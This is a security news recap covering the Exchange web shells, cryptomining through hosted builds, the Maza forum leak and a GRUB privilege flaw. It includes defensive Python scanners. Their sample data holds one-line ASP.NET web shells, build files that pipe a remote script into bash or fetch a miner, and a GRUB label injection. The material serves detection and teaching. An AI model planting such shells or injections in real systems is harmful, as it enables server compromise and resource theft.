SSD’s Security Disclosure weekly news recap — March 11, 2021

Imriah
SSD Secure Disclosure
4 min read · Mar 11, 2021

This is SSD’s weekly security recap.

In this edition, we'll talk about the Microsoft Exchange vulnerabilities affecting governments and businesses around the world, GitHub and Docker Hub abused for crypto-mining, user data from the Maza cybercrime forum exposed online, and our CVE of the week: elevated access through GNU GRUB.

The Microsoft Exchange Hack

After the SolarWinds compromise that has been troubling the US, this new threat has put US organizations such as credit unions, town governments, and small businesses at risk.

Of course, the same vulnerabilities may also be used against organizations in Asia and Europe.

Vulnerabilities in Microsoft Exchange servers allowed attackers to do two things: impersonate a user of the system, and upload arbitrary C# code to the server, a web shell that acts as a backdoor for running arbitrary commands.

Microsoft has released patches correcting these vulnerabilities, but patching does not remove any backdoor that was installed before the patch was applied. This is why the US government is reaching out to affected organizations to help them find and remove the backdoors.
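Because the patch closes the entry point but leaves any dropped web shell in place, the check a defender wants after patching is a hunt through the IIS web root for recently written ASP.NET pages that pass request input to an execution primitive. The following is an added example written for this recap, not code from the original post, from Microsoft, or from any incident report; the indicator patterns, the directory names and the sample page contents are assumptions constructed so that it runs offline.

```python
import os
import re
import tempfile

# Heuristic indicators for an ASP.NET web shell: request-controlled input reaching an
# execution primitive.  These patterns are assumptions chosen to cover common one-line
# shells; treat a hit as a lead for forensic review, not as proof of compromise.
INDICATORS = {
    "eval_of_request": re.compile(r'eval\s*\(\s*Request', re.I),
    "process_start": re.compile(r'System\.Diagnostics\.Process|Process\.Start', re.I),
    "cmd_exe": re.compile(r'cmd\.exe|powershell(\.exe)?\s+-', re.I),
    "assembly_load": re.compile(r'Assembly\.Load', re.I),
    "request_input": re.compile(r'Request\s*(\[|\.(Form|QueryString|Params|Headers))', re.I),
}
EXEC_INDICATORS = {"eval_of_request", "process_start", "cmd_exe", "assembly_load"}
SHELL_EXTENSIONS = (".aspx", ".ashx", ".asmx", ".asax")


def classify(source):
    """Return the matched indicator names if the page looks like a web shell, else []."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(source)]
    # A page that merely reads request input is normal; require an execution primitive.
    return hits if EXEC_INDICATORS & set(hits) else []


def scan_tree(root, modified_after=None):
    """Walk a web root and return [(relative_path, indicators)] for suspicious pages.

    modified_after: optional epoch seconds; older files are skipped so the hunt can focus
    on pages written since the exposure window began."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if not fn.lower().endswith(SHELL_EXTENSIONS):
                continue
            path = os.path.join(dirpath, fn)
            if modified_after is not None and os.path.getmtime(path) < modified_after:
                continue
            with open(path, encoding="utf-8", errors="replace") as f:
                hits = classify(f.read())
            if hits:
                findings.append((os.path.relpath(path, root).replace(os.sep, "/"), hits))
    return sorted(findings)


# Constructed sample web root: paths and contents are made up for this example.
SAMPLE_FILES = {
    "owa/auth/logon.aspx":
        '<%@ Page Language="C#" %><% string u = Request.Form["username"]; %>',
    "owa/auth/logon_backup.aspx":
        '<script language="JScript" runat="server">'
        'function Page_Load(){eval(Request["cmd"],"unsafe");}</script>',
    "aspnet_client/err.aspx":
        '<%@ Page Language="C#" %><% var p = new System.Diagnostics.Process();'
        ' p.StartInfo.FileName = "cmd.exe";'
        ' p.StartInfo.Arguments = "/c " + Request["c"]; p.Start(); %>',
    "owa/auth/themes/base.css": "body { color: #000; }",
}


def build_sample_root():
    """Write the constructed sample tree to a temp directory and return its path."""
    root = tempfile.mkdtemp(prefix="webroot_sample_")
    for rel, content in SAMPLE_FILES.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as f:
            f.write(content)
    return root


if __name__ == "__main__":
    for rel, hits in scan_tree(build_sample_root()):
        print(f"{rel}: {', '.join(hits)}")
```

The benign logon page reads request input but is not flagged, because the check requires an execution primitive as well; the two planted pages are flagged with the indicators that fired. On a real server you would point `scan_tree` at the Exchange web root and pass `modified_after` set to the start of the exposure window.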

Cyberhackers Using GitHub and Docker Hub for Cryptomining

Attackers have been using GitHub and Docker Hub for illicit crypto-mining campaigns. This was discovered last week by the cybersecurity company Aqua Security.

GitHub and Docker Hub are two cloud platforms where companies and independent developers build, ship, and maintain their software: GitHub hosts source code and runs build jobs, and Docker Hub hosts container images and can build them automatically from a linked repository.

Illicit crypto-mining leverages computing resources stolen from victims to mine cryptocurrency on behalf of criminals.

This campaign targets the automated build processes of these platforms: a malicious repository is pushed, the platform's free build service builds it, and the build itself runs the miner. It is an extension of a campaign discovered in September 2020.

The attackers created 92 malicious Docker Hub repositories and 92 Bitbucket repositories. The idea behind them was to abuse the processing power of the platforms' build services for crypto-mining.

Researchers at Aqua advised these platforms to enforce stricter access controls and to increase monitoring of user accounts.
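The monitoring Aqua recommends can start with the build definitions themselves, since a miner run from a build step has to name a binary, a pool or a download-and-execute stage somewhere in the Dockerfile or pipeline file. Below is an added example written for this recap, not code from the original post or from Aqua Security; the indicator list, the severity split and the three sample build files are constructed assumptions.

```python
import re

# Assumed indicator set for miner abuse of hosted build services.  The first four are
# strong (they name mining software, a stratum pool, a mining algorithm or a miner flag);
# the last two are weak stage-and-run patterns that legitimate installers also use.
MINER_INDICATORS = {
    "miner_binary": re.compile(r"\b(xmrig|minerd|cpuminer|xmr-stak|ethminer|nbminer)\b", re.I),
    "stratum_pool": re.compile(r"stratum\+(tcp|ssl)://", re.I),
    "mining_algo": re.compile(r"\b(cryptonight|randomx|ethash|kawpow)\b", re.I),
    "miner_flags": re.compile(r"--donate-level", re.I),
    "pipe_to_shell": re.compile(r"\b(curl|wget)\b[^\n|]*\|\s*(ba|z)?sh\b", re.I),
    "base64_exec": re.compile(r"base64\s+(-d|--decode)[^\n|]*\|\s*(ba|z)?sh\b", re.I),
}
STRONG = {"miner_binary", "stratum_pool", "mining_algo", "miner_flags"}


def scan_build_config(text):
    """Return the names of all indicators that match a build definition."""
    return [name for name, rx in MINER_INDICATORS.items() if rx.search(text)]


def severity(hits):
    """'strong' if any mining-specific indicator fired, 'weak' for stage-and-run only."""
    if STRONG & set(hits):
        return "strong"
    return "weak" if hits else "none"


def triage(configs):
    """configs: {filename: text}.  Returns {filename: (severity, hits)} for flagged files."""
    flagged = {}
    for name, text in configs.items():
        hits = scan_build_config(text)
        if hits:
            flagged[name] = (severity(hits), hits)
    return flagged


# Constructed sample build files.  198.51.100.10 is a documentation address, not a real host.
SAMPLE_CONFIGS = {
    "Dockerfile.miner": (
        "FROM alpine:3.12\n"
        "RUN apk add --no-cache curl && "
        "curl -sL http://198.51.100.10/xmrig.tar.gz | tar xz -C /opt\n"
        'CMD ["/opt/xmrig", "-o", "stratum+tcp://pool.invalid:3333", "-u", "wallet"]\n'
    ),
    "bitbucket-pipelines.yml": (
        "pipelines:\n"
        "  default:\n"
        "    - step:\n"
        "        script:\n"
        "          - curl -s http://198.51.100.10/setup | bash\n"
        "          - sleep 3000\n"
    ),
    "Dockerfile.app": (
        "FROM node:14-alpine\n"
        "WORKDIR /app\n"
        "COPY package*.json ./\n"
        "RUN npm ci\n"
        "COPY . .\n"
        'CMD ["npm", "start"]\n'
    ),
}


if __name__ == "__main__":
    for name, (level, hits) in triage(SAMPLE_CONFIGS).items():
        print(f"{name}: {level} ({', '.join(hits)})")
```

The pipeline file is only flagged as weak: a `curl | bash` followed by a long `sleep` is the shape of a build that fetches a payload and keeps the runner busy, but the same pattern appears in ordinary installer scripts, so it is a signal to review rather than to block. A registry or CI operator would run `triage` over every build definition at push time and feed strong hits to account review.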

Maza Cybercrime Forum’s Users’ Details Leaked

The infamous Maza cybercrime forum, one of the oldest underground cybercrime forums, was breached and its user database leaked: details of around 3,000 users were posted in a PDF file on the forum's front page.

The forum, launched in 2003, has served as a place to trade stolen credit card details and to arrange e-commerce fraud, bank fraud, and other illicit activities.

According to the leaked PDF file, usernames, email addresses, account passwords and social media IDs were posted online, alongside information about each user's client certificate file and its password, which the forum used for login.

While the Maza leak is small compared to other data breaches this year, it is likely one of the most important security incidents of 2021, because it broadly exposed data that can help law enforcement agencies track down current or former cybercriminals.

The GNU GRUB Vulnerability

Finally, our CVE of the week: a vulnerability in GNU GRUB that allows a local user on a Linux system to manipulate GRUB's configuration process so that they gain elevated access the next time the software is run.

GNU GRUB is a multiboot boot loader developed as part of the GNU Project, the free-software project whose programs users may freely run, copy, study, and modify.

The vulnerability abuses GRUB's operating-system detection on Linux: a local user feeds it false information and forces the installation to generate a new configuration file from that information, which causes the system to execute the attacker's commands.
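The recap does not spell out the exact mechanism, so what follows is a generic illustration of the bug class it describes, untrusted data from a probed filesystem interpolated into a generated configuration file, rather than GRUB's own code or the specific flaw. It is an added example written for this recap; the templates, the hostile label, the command allow-list and the sample UUID are assumptions. The quoting rule in `grub_quote` mirrors the one grub-mkconfig_lib applies to single-quoted strings.

```python
import re

# Constructed illustration of configuration-generation injection.  Not GRUB's code.


def render_menuentry_unsafe(label, fs_uuid, kernel):
    """Interpolate a probed OS label straight into a GRUB-style menuentry (the flaw)."""
    return (f"menuentry '{label}' {{\n"
            f"\tsearch --fs-uuid --set=root {fs_uuid}\n"
            f"\tlinux {kernel} root=UUID={fs_uuid} ro\n"
            "}\n")


def grub_quote(s):
    """Escape for a single-quoted GRUB string: close, emit an escaped quote, reopen."""
    return s.replace("'", "'\\''")


def render_menuentry_safe(label, fs_uuid, kernel):
    """Reject control characters in data that came from a probed filesystem, then quote.

    A label with a newline can terminate the menuentry line and start a new command, so it
    is refused outright rather than sanitised; the UUID is held to its expected alphabet."""
    if re.search(r"[\x00-\x1f\x7f]", label):
        raise ValueError("control character in OS label")
    if not re.fullmatch(r"[0-9A-Fa-f-]+", fs_uuid):
        raise ValueError("malformed filesystem UUID")
    return render_menuentry_unsafe(grub_quote(label), fs_uuid, kernel)


# Commands a generated menuentry is expected to contain (assumed allow-list).
ALLOWED_COMMANDS = {"search", "linux", "initrd", "insmod", "set", "echo"}


def unexpected_commands(cfg):
    """Line-based review of a generated config: return commands inside menuentry blocks
    that are not on the allow-list.  Brace depth is counted per line, which is enough for
    generated output but not a full GRUB script parser."""
    unexpected, depth = [], 0
    for line in cfg.splitlines():
        stripped = line.strip()
        if depth > 0 and stripped and stripped != "}":
            cmd = stripped.split()[0]
            if cmd not in ALLOWED_COMMANDS:
                unexpected.append(cmd)
        depth += stripped.count("{") - stripped.count("}")
    return unexpected


# Constructed attacker-controlled label: closes the quoted string and the block, adds its
# own entry, then reopens a plausible-looking entry so the file still parses.
HOSTILE_LABEL = "Ubuntu' {\n\tchainloader (hd0,1)/evil.efi\n}\nmenuentry 'Ubuntu"
SAMPLE_UUID = "1234abcd-0000-4000-8000-000000000001"


if __name__ == "__main__":
    cfg = render_menuentry_unsafe(HOSTILE_LABEL, SAMPLE_UUID, "/vmlinuz")
    print(cfg)
    print("unexpected:", unexpected_commands(cfg))
    print(render_menuentry_safe("Bob's Linux", SAMPLE_UUID, "/vmlinuz"))
```

With the unsafe renderer the hostile label produces two well-formed entries, the injected one carrying a `chainloader` that the allow-list review catches. The safe renderer refuses the label before anything is written, while still accepting an ordinary label with an apostrophe by quoting it. Running `unexpected_commands` over a freshly generated grub.cfg is a cheap post-generation check on a multi-user host even after upgrading.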

We urge administrators of shared hosting and other multi-user systems to upgrade to the latest version of GRUB as soon as possible to mitigate this danger.

Want to Be Part of the News?

At SSD, we help security researchers turn their skills in uncovering security vulnerabilities into a career. Designed by researchers, for researchers, SSD provides the fast response and support needed to get zero-day vulnerabilities and disclosures reported to vendors and to get researchers the compensation they deserve. We help researchers get to the bottom of vulnerabilities affecting major operating systems, software, or devices.

We constantly publish our findings to educate the global security research community. You can find more vulnerabilities on our Advisories page. If you have findings of your own, you can send them to us here using our report template.

Join the conversation:

Visit SSD

Twitter

Facebook

Youtube
